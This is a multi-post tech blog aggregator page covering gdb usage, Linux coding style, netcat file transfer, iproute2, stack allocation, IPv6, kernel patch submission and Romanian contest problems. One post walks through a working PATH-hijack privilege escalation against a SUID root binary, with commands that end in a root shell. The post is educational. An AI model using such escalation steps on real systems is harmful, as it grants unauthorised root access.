(gdb) print &r
$4 = (int *) 0xbfffef5c
(gdb) list # list source code
1 int random() {
2 int r = 4;
3 return r;
4 }
5 int main() {
6 char *no_addr = 0;
7 int r = random();
8 *no_addr = r;
9 return 0;
10 }
(gdb) break 8 # add breakpoint at line 8
Breakpoint 2 at 0x80483cb: file random.c, line 8.
(gdb) continue # continue to next breakpoint
Continuing.
Breakpoint 2, main () at random.c:8
8 *no_addr = r;
(gdb) next
Program received signal SIGSEGV, Segmentation fault.
0x080483d3 in main () at random.c:8
8 *no_addr = r;
(gdb) backtrace # print stack backtrace; show trace of where you are
# which functions you're in
#0 0x080483d3 in main () at random.c:8
(gdb) quit
Now, some other thing you may find useful is to have the value of an expression get printed frequently (automatically, of course). You can do that with display expression. Take this sample code:
int main() {
int i, j = 0;
for (i = 0; i < 10; i++)
j += i * 10;
return 0;
}
And run it in gdb:
(gdb) break main
Breakpoint 1 at 0x804839a: file random2.c, line 2.
(gdb) run
Starting program: /home/andrei/a.out
Breakpoint 1, main () at random2.c:2
2 int i, j = 0;
(gdb) next
3 for (i = 0; i < 10; i++)
(gdb) next
4 j += i * 10;
(gdb) display i
1: i = 0
(gdb) display j
2: j = 0
(gdb) break 4 if i == 8
Breakpoint 2 at 0x80483aa: file random2.c, line 4.
(gdb) continue
Continuing.
Breakpoint 2, main () at random2.c:4
4 j += i * 10;
2: j = 280
1: i = 8
This way you can see how your variables’ value change. To delete a display, use the number associated with it:
(gdb) delete display 2
(gdb) next
4 j += i * 10;
1: i = 3
One last trick worth mentioning in this initial GDB tutorial is setting up your ~/.gdbinit file. When GDB starts up, it looks for a file in the current user’s home directory called .gdbinit; this file is used for simple configuration commands. The format is the following:
define <command>
<code>
end
document <command>
<help text>
end
A simple example of .gdbinit:
andrei@sherlock:~$ cat .gdbinit
define cls
shell clear
end
document cls
Clears the screen with a simple command.
end
define bpl
info breakpoints
end
document bpl
List breakpoints
end
Now you can use cls to clear the screen in gdb, or you can find what breakpoints you’ve set:
(gdb) bpl
Num Type Disp Enb Address What
1 breakpoint keep y 0x0804839a in main at random2.c:2
2 breakpoint keep y 0x080483aa in main at random2.c:4
You can also use .gdbinit inside your project’s directory to include commands used only for this project. It will be read when starting gdb in that directory and it overwrites the settings in ~/.gdbinit. You can add into it a few commands to be run when the gdb starts: commands like setting up the breakpoints and the values used with display commands.
Using the previous source code, we add the following .gdbinit file in the same directory:
b main
r
disp i
disp j
disp /x i
disp
Now, we can run gdb:
$ gdb -q ./a.out
Reading symbols from /tmp/a.out...done.
Breakpoint 1 at 0x804839a: file 1.c, line 5.
Breakpoint 1, main () at 1.c:5
5 int i, j = 0;
3: /x i = 0x0 2: j = 134513616
1: i = 0
(gdb) n
6 for (i = 0; i < 10; i++)
3: /x i = 0x0
2: j = 0
1: i = 0
(gdb) q
Observe the last disp in the .gdbinit file, used to display all expressions defined up to that point.
If you want to disable reading the .gdbinit files, pass a -n flag to gdb just like we passed -q above to strip the header with version info.
Final notes. CGDB is a curses front-end to GDB and is more friendly and coloured than GDB. Also, try this in GDB (I know this from Andrada):
(gdb) b main
Breakpoint 1 at 0x804839a: file random2.c, line 2.
(gdb) r
Starting program: /home/andrei/a.out
Breakpoint 1, main () at random2.c:2
2 int i, j = 0;
(gdb) - # add dash and enter
For more on GDB, check out this tutorial, 8 gdb tricks you should know.
02 April 2012 09:00 PM
26 March 2012
O nouă problemă pentru concurs, numărul 7. Chiar dacă vine cu întârziere, vă veți aminti un joc clasic.
Se dă un teren dreptunghiular cu câteva obstacole pe el. Se cere să construiți cel mai lung șarpe care ar umple terenul într-un joc de Snake.
Ca input veți primi numele unui fișier ce va conține descrierea în formatul următor: x înseamnă obstacol, . înseamnă teren liber. De exemplu:
.........
.x...x...
...x....x
.........
....x....
Ca output produceți același fișier dar cu un șarpe desenat. Punctul de plecare al șarpelui îl maracați cu # urmat de * pentru celula următoare. În continuare, veți desena >,<,^,v pentru fiecare celulă ocupată de șarpe, reprezentând direcția în care se află celula următoare. De exemplu:
......^>>
.x...x^<v
...x.*>vx
.....#.v>
....x<<<v
echivalent cu următorul drum (poziții numerotate în hexa):
......456
.x...x387
...x.129x
.....0.AB
....xFEDC
Sunt 10 teste. Pentru fiecare se va calcula lungimea șarpelui și se va obtine un scor între 0 și 100 în funcție de suma obținută de participant și suma minimă.
Timp de rulare per test 5s.
Pondere: 1.6
Spor.

de Mithrandir la 26 March 2012 09:19 PM
Environment variables are sometimes very important when creating new processes. For example, the PATH variable, that decides what executable to run.
The easiest example to exploit PATH is to add the current directory . to the list and overwrite common shell commands with something else.
$ cat ./ls
echo P0wn3d
$ ls
file1 file2
$ ./ls
P0wn3d
$ export PATH=.:$PATH
$ ls
P0wn3d
But that can only affect the user’s shell and can’t do harm to the system. What if some other conditions exist in the system, like the use of the SUID bit. Normal processes are run as the user who executes them, regardless of who owns the executable file (as long as the user who runs the file can read the file). If the SUID is set on an executable file, any process started from that executable will run as the owner of the file, not shell owner. Here is an example of a very insecure source that shouldn’t be SUID-ed.
#include<stdlib.h>
int main(void)
{
system("ls");
return 0;
}
Let’s assume that the compiled executable from this code is owned by root, SUID-ed and put into /bin with the name ls_root.
$ ls -la /bin/ls_root
-rwsrwsr-x 1 root root 7163 2012-03-21 12:28 /bin/ls_root
What this will enable, for example, is the listing of the /root directory by any user.
$ cd /root
$ ls
ls: cannot open directory .: Permission denied
$ sudo ls
test
$ ls_root
test
The code simply executes the ls command. But what if the ls command isn’t doing what it is supposed to do? Given this setup, as a normal user, we can do the following:
$ ln -s /bin/sh ls
$ echo $$
32655
$ ls
ls ls_root.c
$ ./ls
$ echo $$
32730
$ whoami
alexj
$ exit
$ export PATH=.:$PATH
$ ls_root
# whoami
root
#
The ls_root process will run the ls command. The ls command will run an executable specified by the PATH variable (the executable is /bin/ls). But if the PATH variable is changed in the current bash process, the executable ran by the ls command will now become something else. If the ls_root command is ran by root (with the help of the SUID bit), any of its children will also be processes of root. So, if the ls command will now run a bash executable, it will run a root owned executable that leads to root access.
The SUID is something that is used in Linux systems (sudo and even ping use it), but these executables are very carefully implemented so that normal users can’t exploit them.
26 March 2012 09:00 PM
25 March 2012
Prima prezentare din noua sesiune de Tech Talks va avea ca subiect central tehnologiile Mozilla.
Valentin Goșu ne va vorbi despre tehnologiile Mozila, punctele cheie ale prezentării fiind:
* add-ons
* Firefox core – cum se contribuie la core
* boot2gecko – live demos, bugs
Aşadar, va aşteptam în număr cât mai mare joi, 29 martie, de la ora 18, în sala EG106a.
Be there or be square!
de tinamanea la 25 March 2012 01:35 PM
17 March 2012
Scurt post cu câteva detalii organizatorice despre concursul din 2012.
Întâi, am renunțat la track-ul advanced. Va fi scos ca un alt concurs ceva mai târziu.
Doi, am stabilit premiile pentru concurs. Vor fi 3 premii, pentru (well) primii 3 clasați. Acestea vor consta în cărți, tricouri imprimate cu mesaje potrivite și puzzle-uri challenging după cum au fost și vor fi unele din problemele de aici. Nu zic cum sunt distribuite și conținutul exact pentru că nu vreau să spoilez totul. Veți afla în iunie.
Până atunci, nu uitați să rezolvați problemele. Sunt 5 deja, destul de diverse: 1, 2, 3, 4, 5. Conform clasamentului, problema 2 e cea mai lejeră. Conform mie problema 5 e așa :P Cea mai grea din cele de până acum pare a fi 1 deși e mai simplă decât 3.
Spor :D

de Mithrandir la 17 March 2012 06:17 PM
05 March 2012
Problema de azi este una bonus pentru un premiu special. Este nevoie de un mic script bash/python care să parseze ceva continut. Read more below.
Practic, ne trebuie un script care să parseze conținutul de pe http://rosedu.org/ro/news și să-l transforme în fișiere în format Markdown, câte unul pe articol de la news.
Concursul incepe acum și se termina miercuri (7.03.2012) seara la ora 20:00. Rezultatele joi (8.03.2012) seara la 21:00.
Premiul: un număr de maxim 3 beri (sau echivalent în suc,vin fiert, whatever) distribuit oricând pe durata acestui semestru începând cu data de 10.03.2012.
Premiul va fi oferit scriptului care va realiza o conversie cât mai eficientă, cu cât mai putine erori și bug-uri. În plus, contează calitatea codului, indentarea lui, comentariile, formatarea.
Toate submisiile vor fi făcute publice pe 9.03.2012 la ora 22:00.
Exemplu de output (pentru primul articol de pe prima versiune a site-ului ROSEdu):
---
layout: base
date: 2008-04-09
author: admin
title: Avem si blog
category: ro
---
Datorita cererilor voastre am activat functia de Blog în cadrul site-ului nostru. Deocamdată sistemul actual nu este la fel de puternic ca WordPress, să spunem, însă el foloseşte acelaşi user cu restul site-ului şi forumul şi permite o integrare mai bună. Apropo, vine şi TinyMCE în curând. Pentru a posta odată ce ai drepturi foloseşte meniul din stânga. So, happy blogging! Sergiu.
Pentru alte outpuri vizualizați continutul repo-ului versiunii viitoare a site-ului (Jekyll), în special partea de _posts.
Spor :)
PS: În caz de punctaje foarte apropiate la CP2012 este posibil ca o submisie de aici să valoreze un epsilon semnificativ în plus :)

de Mithrandir la 05 March 2012 09:18 AM
27 February 2012
Good programmers know that writing code is more than just… writing code. It’s more than writing efficient code… It’s also about writing good code with respect to the ones that are going to read and/or use that code. This is specially true in open source communities where potentially hundreds of people could be looking at your code. You have to write code that can be easily read and used by others. And to do that, you need some some sort of standards of code writing. This is where the idea of coding styles comes in.
Every software project has its (hopefully properly defined) coding style. It can depend a lot on the programming language that the project uses. The style can specify the indentation, the variable naming, the use of spaces or the use of curly braces.
For example, the Linux Kernel has its coding style well defined in the Documentation pages. It is based on the Kernighan & Ritchie (K&R) style, the Linux Kernel being written in C. This is a very popular coding style with several projects using it, sometimes considered the de facto coding style for C.
If you want to check if your code follows the coding style of Linux, you can use checkpatch.pl. This script can be found in the source code of the Linux Kernel in the scripts directory. It is mainly used for checking patches submitted for Linux, but it can be used on normal C source fies using the -f parameter. You need to clone the Linux tree to get the script, and you need to run it from the root of the tree.
Here is an example of badly written code:
1
2 int main(void)···
3 {
4 int i,a;···
5 » »
6 for(i=0;i<10;i++)
7 a=i;
8 //this code is useless
9 if(a==i){
10 return 0;
11 }
12
13 return 0;
14 }·····
Note that the · character would represent a space and » would represent a tab. Spaces would represent… spaces.
And this is what checkpatch would report:
alexj@ixmint ~/linux $ scripts/checkpatch.pl -f bad.c
ERROR: trailing whitespace
#2: FILE: bad.c:2:
+int main(void) $
ERROR: trailing whitespace
#4: FILE: bad.c:4:
+ int i,a; $
WARNING: please, no spaces at the start of a line
#4: FILE: bad.c:4:
+ int i,a; $
ERROR: space required after that ',' (ctx:VxV)
#4: FILE: bad.c:4:
+ int i,a;
^
ERROR: trailing whitespace
#5: FILE: bad.c:5:
+^I^I$
WARNING: please, no spaces at the start of a line
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)$
WARNING: suspect code indent for conditional statements (3, 6)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
+ a=i;
ERROR: spaces required around that '=' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: space required after that ';' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: spaces required around that '<' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: space required after that ';' (ctx:VxV)
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
^
ERROR: space required before the open parenthesis '('
#6: FILE: bad.c:6:
+ for(i=0;i<10;i++)
WARNING: please, no spaces at the start of a line
#7: FILE: bad.c:7:
+ a=i;$
ERROR: spaces required around that '=' (ctx:VxV)
#7: FILE: bad.c:7:
+ a=i;
^
WARNING: please, no spaces at the start of a line
#8: FILE: bad.c:8:
+ //this code is useless$
ERROR: do not use C99 // comments
#8: FILE: bad.c:8:
+ //this code is useless
WARNING: please, no spaces at the start of a line
#9: FILE: bad.c:9:
+ if(a=i){$
WARNING: suspect code indent for conditional statements (3, 3)
#9: FILE: bad.c:9:
+ if(a=i){
+ return 1;
ERROR: spaces required around that '=' (ctx:VxV)
#9: FILE: bad.c:9:
+ if(a=i){
^
ERROR: space required before the open brace '{'
#9: FILE: bad.c:9:
+ if(a=i){
ERROR: space required before the open parenthesis '('
#9: FILE: bad.c:9:
+ if(a=i){
ERROR: do not use assignment in if condition
#9: FILE: bad.c:9:
+ if(a=i){
WARNING: braces {} are not necessary for single statement blocks
#9: FILE: bad.c:9:
+ if(a=i){
+ return 1;
+ }
WARNING: please, no spaces at the start of a line
#10: FILE: bad.c:10:
+ return 1;$
WARNING: please, no spaces at the start of a line
#11: FILE: bad.c:11:
+ }$
WARNING: please, no spaces at the start of a line
#13: FILE: bad.c:13:
+ return 0$
ERROR: trailing whitespace
#14: FILE: bad.c:14:
+} $
total: 16 errors, 11 warnings, 14 lines checked
NOTE: whitespace errors detected, you may wish to use scripts/cleanpatch or
scripts/cleanfile
bad.c has style problems, please review.
Most of the errors are regarding whitespaces, space or tab characters that shouldn’t be there. It’s hard to spot spaces or tabs because they are invisible. But a good tip is to make them visible in your editor. Visually replacing characters will not modify the source (spaces will still be spaces) but they will pop up in your editor so you know to delete them. For example, in vi you can use this (credits to ddvlad for it):
set list listchars=tab:»\ ,trail:·,extends:»,precedes:«
Other warnings come from the fact that indentation was made with 3 spaces and not 8. Tabs and spaces should be used consistently. For example, you can set in vi the ‘width’ of a tab with:
:set tabstop=8
There are places where you don’t want spaces, but there are situations where you do want them. You should leave a space after keywords like if or for and around operators like =. Doing this makes the code a lot more readable.
Curly braces should be used, but only when needed. If an if has only one instruction to be executed on the branch, it is pointless to have braces enclosing it. Indentation is enough to mark the instruction.
Comment types are a delicate subject. The classic C specification only allows /* */ block comments. C99 allows // as one line comments. Some coding styles (like the Linux coding style) don’t allow C99 comments.
This is the way the code should look like with proper coding style:
1 int main(void)
2 {
3 » int i, a;
4
5 » for (i = 0; i < 10; i++)
6 » » a = i;
7 » /* This code is useless */
8 » if (a == i)
9 » » return 1;
10
11 » return 0;
12 }
Other programing languages can have similar coding guidelines. For Python, there is PEP, as dictated by the creator of Python himself.
But we should always keep in mind that there is no One True Coding Style. Like all great debates, everybody could argue that one is better than another. What is important and everybody (mostly) agrees is to have consistency within a project in regards to the code the community writes.
27 February 2012 10:00 PM
25 February 2012
You are on a (Linux) box and you want to transfer some files on another system. What are some ways to do that?
The first and most obvious way is to copy them over ssh using the scp tool. You can copy to and from the server and you can use the recursive copy to transfer entire directories.
But what if you don’t have proper account access (you can’t reach accounts because of lack of passwords or keys, for example)? Here is a rather hackish solution: nc.
The netcat tool (the nc command) is found on most Linux systems. You can create TCP or UDP servers and clients with just one command. You can use the shell redirection operators to put files into a TCP stream and take the data out of the stream. Here is an example of a copy from a server to a client:
Server:
alexj@ixmint ~ $ md5sum lin.zip
3008726d03363b89bcf743c0fde4d5f8 lin.zip
alexj@ixmint ~ $ cat lin.zip|nc -l 12345
Client:
alexj@hathor /tmp $ nc ixmint.local 12345 >lin.zip
alexj@hathor /tmp $ md5sum lin.zip
3008726d03363b89bcf743c0fde4d5f8 lin.zip
You could transfer an entire directory (or several files) by first compressing the content.
Server:
alexj@ixmint ~ $ tar -czvf - some_folder | nc -l 12345
Client:
alexj@hathor /tmp $ nc ixmint.local 12345 | tar xzvf -
What other more userfriendly ways are threre? HTTP would be good at this, but configuring Apache with vhosts and aliases is kind of an overhead. What you can do, is start a HTTP server using Python in just one line (of course, you need python installed):
alexj@ixmint ~ $ python -m SimpleHTTPServer 1234
Serving HTTP on 0.0.0.0 port 1234 ...
The current working directory where you ran the command will be the www root and any files in that directory will be published (as long as the process will have correct permissions to those files). You can then use a web browser (it can be Firefox or other GUI clients or a simple wget) to access the URL.
Credits to Alex Morega for tar|nc idea and Vlad Dogaru for python
SimpleHTTPServer idea.
25 February 2012 10:00 PM
11 February 2012
Prima problemă din cadrul concursului de programare pe 2012 este inspirată dintr-un joc matematic simplu.
Este vorba de Chomp. Ne vom opri la cazul 2D pentru problema actuală și-l vom modela exact ca în articol pe baza unei ciocolate (poftă bună :P) Ideea e simplă: se dă o ciocolată și cine mănâncă ultimul pătrățel din ea pierde jocul. În momentul în care selectezi un pătrățel pentru a-l mânca trebuie să mănânci toate pătrățelele la dreapta și în jos.
Matematic, problema este echivalentă cu a porni de la un șir de numere și a reduce pe rând numerele din șir păstrând o restricție de monotonie: la orice moment de timp șirul este descrescător (strict necrescător). Cel care este forțat să ajungă în poziția pierde.
Teoria jocurilor clasifică toate pozițiile dintr-un joc cu informație totală în funcție de cine câștigă ca fiind safe (jucătorul care urmează să joace pierde) sau unsafe. Alternativ, definițiile sunt de (jucătorul care a ajuns în poziție câștigă) sau (jucătorul care pleacă din poziție câștigă). Dintr-o poziție se poate ajunge doar în poziții în timp ce orice poziție garantează existența unei mutări ce va duce într-o poziție . Evident, este o poziție la fel ca și .
Cerința problemei e simplă: fiind dată o listă de poziții în diverse jocuri de Chomp să se specifice dacă acestea sunt poziții sau .
Fiecare poziție este specificată prin șirul valorilor și este dată pe un singur rând la standard input. De exemplu
2 2 1
3 1 1
2 1
2 2
reprezintă o intrare validă pentru programul vostru. Outputul trebuie să fie litera P sau N, câte una pe linie, corespunzătoare fiecărei poziții primite la intrare.
P
P
P
N
Există 100 de teste, fiecare cu 100 de poziții. Scorul unui test este între 0 și 1, în funcție de câte poziții au fost identificate corect. Scorul final este suma scorurilor fiecărui test.
Ponderea problemei în clasamentul final este 1.
Spor.
PS: Ar putea fi util și articolul de aici.
PPS: Ca istorie, problema asta m-a pasionat din liceu, din când în când mă mai jucam cu ea. Unii matematicieni oferă premiu pentru instanțele mai grele ale ei, dacă vă pasionează/atrage puteți să încercați.

de Mithrandir la 11 February 2012 09:59 PM
10 February 2012
What clings to a wall, but travels all the world?
La începutul săptămânii (și duminica din săptămâna trecută), am plecat în excursie la Bușteni, o excursie organizată de ROSEdu și sponsorizată de IXIA pentru studenții și mentorii de la ediția din toamnă a CDL.

(pic from Victor, more to come)
Am plecat de la puțină zăpadă câtă era pe aici și când am ajuns acolo după doar 2-3 minute de întârziere primul lucru remarcat a fost zăpada. Mare și fină, numai bună de bulgărit și construit.
Ajunși la vilă, am lăsat bagajele acolo și am trecut la o rundă de câteva ore de bulgăreală pe echipe create ad-hoc. Cu bulgări de diferite dimensiuni, unii chiar ridicați cu ambele mâini. It was fun.
Mai târziu am urcat să construim oameni de zăpadă în mărime naturală. Și cum zăpada ne permitea s-au adăugat și câteva detalii, sculptate în zăpadă de Slavic :)
Inside s-au jucat board-games diverse. Mafia, mima – cu expresii din cântece, jocuri, povești: a trebuit să mimez finalul de la primul episod din Robotzi, singurul văzut și am mai mimat și «in a hole in the grund there lived a hobbit»-, Aye Dark Overlord - în care cineva voia să-l omoare pe Rigor Mortis :) -, Catan, 7 Wonders, etc.
Overall, a fost super tare. Chiar dacă a trebuit să stau imobilizat după un accident pe gheață și i-am încurcat puțin pe colegi.
PS: Clătitele au ieșit 140% geniale :D

de Mithrandir la 10 February 2012 07:49 AM
16 January 2012
On modern Linux distributions, the users have two main possibilities of configuring the network: ifconfig and ip.
The ifconfig tool is part of the net-tools package along side other tools like route, arp and netstat. These are the traditional userspace tools for network configuration, made for older Linux kernels.
The iproute2 is the new package that comes with the ip tool as replacement for the ifconfig, route and arp commands, ss as the new netstat and tc as a new command.
There are pros and cons for each of them and there are users (and fans) of each. Let’s see the differences…
First of all, why was the iproute introduced? There had to have been a need for it… The reason was the introduction of the Netlink API, which is a socket like interface for accessing kernel information about interfaces, address assignments and routes. The tools like ifconfig used the /proc file hierarchy (procfs) for collecting information. The output was reformatted data from different network related files in /proc.
alexj@hathor ~/techblog $ strace -e open ifconfig eth0 2>&1|grep /proc
open("/proc/net/dev", O_RDONLY) = 6
open("/proc/net/if_inet6", O_RDONLY) = 6
The costs for the operations like open and read from these files were rather big compared for the netlink interface. For comparison, let’s assume that we have a large number of interfaces (128) with IPv4 and IPv6 addresses and their associated connected routes.
alexj@hathor ~/if $ time ifconfig -a >/dev/null
real 0m1.528s
user 0m0.080s
sys 0m1.420s
alexj@hathor ~/if $ time ip addr show >/dev/null
real 0m0.016s
user 0m0.000s
sys 0m0.012s
But most of normal users are not that geeky to care about millisecond speedup. They do, however, care about usability. And iproute2 does seem to have a better user interface. The ip command is better organized, in what they called objects. Links, addresses, routes, routing rules, tunnels are all objects, that can be added, deleted or listed. If a user learns how to add an address, by intuition, he can easily guess how to add a route, for example, because the syntax in similar.
Keyword shortening and auto completion makes the ip command more efficient by removing redundant characters. The following commands are identical as effect:
ip address show
ip address
ip addr show
ip a s
ip a
Some network engineers will like iproute2 because it’s similar to Cisco’s IOS: “ip route show” in Linux vs “show ip route” in IOS. Another usability feature is that you have the \number format for subnet masks instead of the quadded-decimal format, the first one being shorter to write and more up to date with the concept of VLSM.
So what does ifconfig still have to keep it around? Its biggest weakness is its biggest strength: its age. ifconfig has been out and used for so long that it’s very hard to put it away. Still many scripts in the heart of Linux distributions rely on ifconfig to work and most system administrators are used to the ifconfig command and it’s hard to move them to something new and unfamiliar. A lot of tutorials on the Internet about network configuration teach ifconfig and not iproute2 to beginners. For example, LPIC-1, one of the biggest Linux Certification out there, still requires ifconfig skills for passing the exam and barely mentiones iproute2.
When released, iproute2 had at least one advantage over ifconfig, and that was the feature of interacting with the IPv6 stack while ifconfig was only for IPv4. But since then, fans of ifconfig patched it so it could also be IPv6 ready.
But other features were not replicated. In old Linux Kernels, an interfaces could have only one IP address, so in ifconfig you could configure only one IP address on an interfaces. In newer kernels, each interface has a list of addresses and iproute2 via the NetLink interface could manage them. Latest ifconfig versions still rely on the idea of subinterfaces to provide more than one address on an interfaces.
So, given all these arguments, iproute2 should be declared the winner. But it’s not that easy. Just like in the case of IPv4 vs IPv6, where the latter one is the obvious choice, iproute2 will eventually replace ifconfig. Only it’s going to take a long time for that to happen, so net-tools will still be around for some time, but they will be eventually phased out.
16 January 2012 10:00 PM
17 December 2011
Stack space is the part of each process’ virtual memory where function arguments and return addresses are stored, along with local variables declared within a function. Usually, the stack begins at the high address space of the virtual memory and grows down.
At every function call, a new stack frame is created on the stack. It contains the parameters sent to the function, the return address (the address of a code in the caller function) and the locally declared variables.
For each function call, the SP/ESP (Stack Pointer/Extended Stack Pointer) is set so the stack has a big enough size to accommodate local variables. For example, in theory, if you have a local char variable and an int variable, the SP should be set (moved) to 5 bytes.
In practice, the compiler will allocate stack space a little different than expected. It will allocate local variables space in increments of a fixed size, so sometimes having two int variables or three int variables will be the same.
As an example, gcc will allocate in increments of 16 bytes. Let’s make an experiment… we take a simple C program and turn into assembly code.
The C file looks something like this:
int main(void)
{
int a=1, b=2;
return 0;
}
The variables must be used after declaration or they will be ignored by the compiler.
The resulting assembly code (with an gcc -S) looks like this:
main:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
movl $1, -4(%ebp)
movl $2, -8(%ebp)
movl $0, %eax
leave
ret
Notice the subl instruction that clears 16 bytes in the stack space by decrementing the ESP. Those 16 bytes are enough for four 32bit integers. If you have 1,2,3 or 4 local variables declared (and used), you get those 16 bytes.
If we declare 5 integers, the allocated space will now be 32bytes. Same thing for 6, 7, or 8. If we have 9 to 12 integers the compiler will allocate 48 bytes. An so on…
What if we don’t only have integers? Let’s add some chars.
int main(void)
{
int a=1, b=2;
char c=3, d=4;
}
Result:
main:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
movl $1, -8(%ebp)
movl $2, -12(%ebp)
movb $3, -1(%ebp)
movb $4, -2(%ebp)
movl $0, %eax
leave
ret
The function would need 10 bytes, but still gets 16. So the allocation is in increments of 16 bytes no matter what.
The question remains why? It has to do with the cache alignment. The compiler will try to structure the memory usage so that the executed code can be easily fetched from memory and cached. A correct alignment will cause minimum cache misses for memory access.
Credits to SofiaN for help with initial observations and tests.
17 December 2011 10:00 PM
02 December 2011
As we all know, IPv6 is the new protocol of the Internet, that will come to replace the current version of IP (Internet Protocol), IPv4. It will come to fix the flaw of the 32 bit addressing in IPv4, flaw that led to the current shortage of usable address in the Internet.
The addressing issue is not something new. The IETF started looking into a replacement for IPv4 since 1992-1993, when they started the IPng (IP next generation) discussion group and by 1996, they had the specifications for IPv6.
So considering that the Internet is about 40 years old and the IPv4 addressing problem is been known for about half that time, why is it that after 15 years since having the solution in the form of IPv6, why is it still not predominately used?
Probably the easiest way to have build the IPng is with a backwards compatibility (for example, using a variable length address, like OSI’s CLNP, where all the IPv4’s address space is just a part of the IPv6 space, using 32 bits). But since they wanted to start from scratch an rewrite everything in order to fix other problems in IPv4 (like the now almost useless header checksum) and to add new features (like the header extensions that allows protocols like IPSec to be built inside IPv6). But the “rewrite everything” approach meant that almost all of the components of the network layers had to be rewritten and this resulted in a large groups of people being affected by the change.
First were the network administrators, the ones that had to ensure that their routers, multilayer switches, firewall and wireless controllers were ready to be migrated. Most of the old equipment had to be replaced with new ones, or at least have their software updated. Current equipment do most of their packet processing in hardware to get better performance, but this is valid only for IPv4 packets. Hardware processing for IPv6 packets is something that only very new models of routers and switches do, and companies don’t really want to buy new equipment since the costs are rather big. Routing protocols had to be rewritten or modified or written from zero. OSPFv3, the link state protocol and the simple and lightweight distance vector, RIPng, had to be implemented from scratch. More modular, IP independent protocols like EIGRP and Intergrated IS-IS needed new modules for the new protocol.
System administrators had the same concern, getting their services IPv6 ready. From setting up their web services to listen on both protocols to the more difficult service, DNS. If DNS in IPv4 was a good thing to have, in IPv6, DNS is critical (nobody wants to remember a 32 hexadecimal digit number). The DNS protocol needed to add a new record, the AAAA record, and needed to implement a new reverse DNS zone, the ip6.arpa. zone.
But some of the frustrations of the administrators and the users are caused by bugs or even lack of implementation in software. Since every hardware needs a software, IPv6 first of all needs support in the software written. Kernel, system and application programmers needed starting building in support for IPv6. For example, people started patching Linux 2.1 back in 1996, but real stable, built-in support for IPv6 only came out in 2.6. Support in kernel still didn’t mean that people could use it because it lacked the userspace tools. The wide used ifconfig wasn’t build for v6, and only with the development of iproute2, Linux users could configure IPv6 on their boxes. Although considered deprecated, newer versions of ifconfig do support IPv6 address assignments. In the Windows world, things are worse, since only Windows 7 really has full support (kernel and user space tools) for IPv6.
Only after the IPv6 stack is built inside the kernel (the network stack being one of the hardest part of the kernel to program), the system programmers could start porting their programs to be IPv6 ready. IPv4 and IPv6 sockets are not compatible, because the second one needs to implement the address family AF_INET6. An IPv6 ready application also needs to be IPv4 working, so it needs to be smart and know when to create a v4 connection or a v6 connection. Because if only sometimes a v6 infrastructure is available, a v4 infrastructure is almost sure there. But if both are available, which one do you chose, because maybe one works better than the other in that situation?
So as we can see, there is not one group affected by the migration to IPv6, but rather an entire ecosystem, with several groups affecting each other.
02 December 2011 10:00 PM
27 November 2011
Suppose your favorite application or a library you are using has a bug. You find that the code is open source and are happy because of this. Being a programmer yourself, you know that you can fix the bug and send a patch with the fix to the maintainers. But how do you do this? This article will provide a short walkthrough for this task using as an example the Linux kernel. Different projects use different source version control systems. Because this article works on the kernel tree, I am going to use git as an example.
So, the first thing to do is to clone the project’s repository. This is to ensure that you are working on the latest source – maybe the bug was fixed before and your operating system’s package manager is behind on updates. For our kernel example, we will be cloning the net-next tree since this is where our final patch will land – from there it would be applied to the Linux kernel itself but this process is not the subject of this article.
$ git clone
git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git
Cloning into 'net-next'...
remote: Counting objects: 2241130, done.
remote: Compressing objects: 100% (350702/350702), done.
remote: Total 2241130 (delta 1873243), reused 2236736 (delta 1869251)
Receiving objects: 100% (2241130/2241130), 442.07 MiB | 947 KiB/s,
done.
Resolving deltas: 100% (1873243/1873243), done.
Next, create a new branch on which to work and checkout it. All our work will be done there and we will use this branch later when constructing the patch to be sent upstream.
$ cd net-next/
$ git branch speedup_proc_net_dev
$ git checkout speedup_proc_net_dev
Switched to branch 'speedup_proc_net_dev'
Now, do your work, change the source, fix the bug or develop the improvement. Be sure to follow the coding standards of the project you are contributing to. Commit often as told in the git article. At the end of the task, when everything is solved and you are ready to submit the patch, you can rebase the commits into a single one or a set of commits depending on their content – it is better to have a single logical change per commit, also your patch will have an increased chance of being accepted if each commit is small. When rebasing your commits be sure to have a relevant commit message (as per git article for example). For the Linux kernel there is a standard even in the commit message. Start with a single line detailing the component you’re patching and a short description of the commit then – after an empty line – write a longer message detailing what you have done. Add relevant information about the problem that you solved, and – if possible – tests made when developing your solution. Also add a Signed-off-by line. For example, the following is an example of a good commit message.
dev: use name hash for dev_seq_ops
Instead of using the dev->next chain and trying to resync at each call to
dev_seq_start, use the name hash, keeping the bucket and the offset in
seq->private field.
Tests revealed the following results for ifconfig > /dev/null
* 1000 interfaces:
* 0.114s without patch
* 0.089s with patch
* 3000 interfaces:
* 0.489s without patch
* 0.110s with patch
* 5000 interfaces:
* 1.363s without patch
* 0.250s with patch
* 128000 interfaces (other setup):
* ~100s without patch
* ~30s with patch
Signed-off-by: Mihai Maruseac <mmaruseac@ixiacom.com>
Next step is to create the patch files. We do this by switching to the master branch and doing a git format-patch operation.
$ git checkout master
Switched to branch 'master'
$ git format-patch master..speedup_proc_net_dev
0001-Speedup-proc-net-dev-filling.patch
As you see, in our case a single file was created since our speedup_proc_net_dev branch was only a commit ahead of the master branch (we previously rebased everything into a single commit). This will be the file containing our patch, the file we will send upstream. But, before going there we still have a lot of things to do.
First of all, we will need to check our patch for coding style mistakes. In the case of the Linux kernel there is a script doing that and we will use it. For other projects, we may need to do this step manually.
$ ./scripts/checkpatch.pl 0001-Speedup-proc-net-dev-filling.patch
total: 0 errors, 0 warnings, 122 lines checked
0001-Speedup-proc-net-dev-filling.patch has no obvious style problems and is ready for submission.
If there are problems we will have to go back to our branch, fix them, rebase all commits and recreate the patches with git format-patch. When everything is ready to be submitted we can send the patch to the developers via an email. In most projects you will simply create a bug report and attach the fix there and you are done. But since the Linux kernel is more complex we will have to use the email path presented in the following paragraphs.
First of all, we have to find where to send the patch. We have another script which can be used.
$ ./scripts/get_maintainer.pl 0001-Speedup-proc-net-dev-filling.patch
